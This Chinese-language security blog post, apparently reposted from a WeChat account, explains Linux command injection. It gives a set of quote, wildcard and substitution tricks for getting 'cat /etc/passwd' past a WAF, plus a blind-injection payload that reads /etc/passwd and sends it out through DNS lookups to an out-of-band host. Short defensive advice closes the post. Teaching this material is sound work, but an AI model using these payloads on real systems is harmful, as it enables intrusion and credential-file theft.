当你在咖啡厅点一杯咖啡时,是不是想过这样一个场景:如果有人偷偷混到厨房,对咖啡师说"别做拿铁,给我做杯免费的特调",而咖啡师竟然照做了!在网络世界中,这种情况真实存在,它有个专业名称——命令注入攻击。
什么是命令注入?看完秒懂
命令注入,顾名思义,就是黑客将自己的指令"注入"到系统中,让服务器乖乖执行。想象一下,你本来只是想让系统查询一下天气,但黑客却悄悄在你的请求后面加上了"顺便把用户数据库发给我"的指令,而系统竟然不加辨别地执行了!
命令注入主要分为两种类型:
-
响应型命令注入:你发送指令,服务器执行后直接把结果返回给你(就像问路,对方立刻告诉你答案) -
盲注型命令注入:你发送指令,服务器执行了,但不告诉你结果(就像你给别人下了命令,他偷偷去做了,但不向你汇报)
本文将聚焦于Linux系统下这两种注入的实现方法和绕过技巧。没想到看起来不可能的事情,在终端里却可能实现,是不是很神奇?
绕过防护的小把戏:Bash命令变形术
网站一般都有防火墙(WAF)来检测和阻止可疑命令。但就像电影里的特工会伪装身份一样,命令也可以"乔装打扮",躲过防火墙的"眼睛"。
下面这些字符可以在Bash命令和文件路径中使用,而不会破坏语法:
# 双引号魔法(可用于命令和文件路径)
c""at /etc/pas""swd
# 单引号变装(命令和文件路径都适用)
c''at /etc/pas''swd
# 星号通配符(仅适用于文件路径)
cat /e*tc/pas**swd
# $() 命令替换(命令和文件路径)
ca$()t /etc/pas$()swd
# ${} 参数扩展(命令和文件路径,不能为空)
ca${7}t /etc/pass${7}wd
你可能会问,这些奇怪的符号是什么意思?简单解释一下:
-
$()是命令替换,允许你在一个命令中执行另一个命令并替换其输出 -
${}是参数扩展,用于灵活地访问和操作变量值
这些看似无意义的符号组合,却能巧妙地绕过防火墙的检测规则,就像特工用假胡子和墨镜躲过监控摄像头一样。
响应型命令注入:直接看结果的黑客技巧
在响应型注入中,你注入命令后,服务器会乖乖执行并返回结果。比如,如果你直接注入cat /etc/passwd(查看系统用户信息的命令),防火墙肯定会立刻拦截这个明显的恶意请求。
但是,借助我们刚学的"变装术",可以用以下方式绕过检测:
cat /etc/passwd | head -n 1 | base""64
cat "/e"tc'/passwd' | head -n 1 | ba''se64
cat /et*c/pas*wd | head -n 1 | bas''e64
cat /et**c/pas**d | head -n 1 | base""64
cat /et""c/pa""wd | head -n 1 | base""64
cat /et''c/pass''wd | head -n 1 | base''64
cat /et$()c/pass$()wd | head -n 1 | base$()64
cat /et${7}c/pass${7}wd | head -n 1 | base${7}64
这些看似乱码的命令,实际上都在做同一件事:读取/etc/passwd文件的第一行,并用base64编码。只不过它们都穿上了"隐形衣",试图躲过防火墙的法眼。
盲注型命令注入:黑暗中的数据窃取
盲注更具挑战性,因为你看不到命令执行的结果。这就像在黑暗中工作,你需要一种方式来"感知"命令是否成功执行。
这时,我们需要一个"接收器"——OOB(Out-of-Band,带外)服务器,它可以接收从目标服务器发送的数据。想象成你在目标系统里安插了一个"间谍",它会偷偷把信息传回你的"大本营"。
设置OOB服务器的方式有几种:
-
使用自己的域名和VPS(虚拟专用服务器) -
利用Interactsh公共OOB服务器(免费) -
如果你有Burp Pro,可以使用Burp Collaborator
假设我们设置好了OOB服务器,域名为zwjzvr.oast.fun,下面是如何使用它的例子:
标准的盲注payload会提取/etc/passwd文件的第一行,用base64编码,然后通过DNS请求发送到你的OOB服务器:
GETID=$(cat /e*t*c/pa${777}s""s$()w''d | head -n 1 | ba$()se""64) && nsl""ook$()up $GETID.zwjzvr.oast.fun
这个看似复杂的命令做了一件很聪明的事:它先读取系统敏感文件内容,然后通过DNS查询的方式把数据悄悄带出来。这种方法特别厉害,因为即使有些防火墙会阻止HTTP/HTTPS外联,但很少有系统会完全阻止DNS查询。
为什么这些技巧值得了解?
你可能会问:"学这个干嘛?我又不是黑客。"了解这些技巧有两个重要原因:
-
防御意识:了解攻击者的手段,才能更好地保护自己的系统。就像了解小偷如何撬锁,才能选择更安全的锁。 -
安全测试:如果你是开发者或安全测试员,这些技巧可以帮助你验证系统是否存在漏洞,及时修补安全隐患。
记住,安全不是一成不变的。随着防御技术的进步,攻击技术也在不断演化。持续学习,才能在这场没有硝烟的战争中保持领先。
实用防护建议
了解了攻击手段,我们也应该知道如何防御:
-
输入验证:对所有用户输入进行严格过滤,拒绝包含可疑命令的请求 -
最小权限原则:系统运行时使用最低必要权限,限制潜在损害 -
使用参数化命令:避免直接拼接用户输入到系统命令中 -
定期安全审计:检查系统是否存在命令注入漏洞 -
部署WAF:使用Web应用防火墙拦截可疑请求
安全是一场永无止境的猫鼠游戏。作为系统的守护者,我们需要时刻保持警惕,了解攻击者的招数,并提前做好防护。
关注我们的公众号,并给本文点赞,点个推荐支持一下吧!您的每一个小红心,都是我坚持创作优质内容的最大动力
原文始发于微信公众号(HW安全之路):黑客的隐形武器:命令注入攻击原理与绕过技巧详解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论